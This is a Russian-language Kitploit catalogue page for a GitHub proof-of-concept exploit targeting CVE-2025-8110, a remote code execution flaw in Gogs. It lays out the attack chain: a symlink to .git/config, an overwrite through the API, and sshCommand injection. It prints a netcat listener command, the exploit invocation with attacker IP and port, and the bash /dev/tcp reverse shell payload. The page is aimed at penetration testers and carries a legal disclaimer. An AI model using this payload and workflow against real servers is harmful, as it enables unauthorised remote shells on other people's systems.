Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8110 — Эксплойт доказательства концепции для CVE-2025-8110 — уязвимости удалённого выполнения кода (RCE) в Gogs, использующей обход пути через символические ссылки и инъекцию sshCommand для доставки reverse shell. | Kitploit
Инструменты/GitHubGitHub/ghxstsec/cve-2025-8110
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Эксплойт доказательства концепции для CVE-2025-8110 — уязвимости удалённого выполнения кода (RCE) в Gogs, использующей обход пути через символические ссылки и инъекцию sshCommand для доставки reverse shell.

Репозиторий
534 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Gogs RCE (CVE-2025-8110)

Python License Expertise

Доказательство концепции (PoC) для CVE-2025-8110, критической уязвимости в Gogs, которая позволяет выполнять удалённый код (RCE) через манипуляции с .git/config с помощью обхода символических ссылок и инъекции sshCommand.

📖 Обзор

Этот эксплойт нацелен на недостаток Path Traversal в API управления контентом Gogs. Аутентифицированный пользователь может:

  1. Создать репозиторий и запушить символическую ссылку, указывающую на внутренний файл .git/config.
  2. Использовать API для перезаписи целевого конфигурационного файла через симлинк.
  3. Внедрить вредоносный sshCommand для выполнения Reverse Shell, когда сервер выполняет Git-операции.

🚀 Возможности

  • Автоматизированный рабочий процесс: Управляет входом в систему, созданием репозитория, развёртыванием симлинка и отравлением.
  • Надёжное кодирование: Автоматически URL-кодирует учётные данные для обработки специальных символов (например, !, @).
  • Наглядный вывод: Логирование с высокой читаемостью с помощью библиотеки Rich.

🛠 Предварительные требования

  • Python 3.12+
  • Установленный Git в локальной системе.
  • Действительные учётные данные на целевом экземпляре Gogs.

📦 Установка

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

Install dependencies:

root@kitploit:~
pip3 install -r requirements.txt

💻 Использование

Запустите ваш слушатель:

root@kitploit:~
nc -lvnp 6666

Запустите эксплойт:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Аргументы:

Суть уязвимости:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Когда Gogs выполняет Git-команду, требующую сетевого транспорта (например, синхронизацию зеркала или внутреннюю проверку ссылок), он вызывает sshCommand, что запускает обратную оболочку.

⚠️ Правовое предупреждение: Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным скриптом. Несанкционированный доступ к компьютерным системам незаконен.

Скачать инструмент
АргументОписание
-u, --urlБазовый URL целевого экземпляра Gogs (например, http://target.htb:3000).
-lh, --hostIP-адрес атакующего (LHOST), на который будет подключаться обратная оболочка.
-lp, --portПорт прослушивания (LPORT), настроенный на вашей машине.
-p, --passwordПароль для учётной записи pwnuser для выполнения аутентификации.
-x, --proxy(Необязательно) Направляет трафик через локальный прокси (по умолчанию: http://localhost:8080).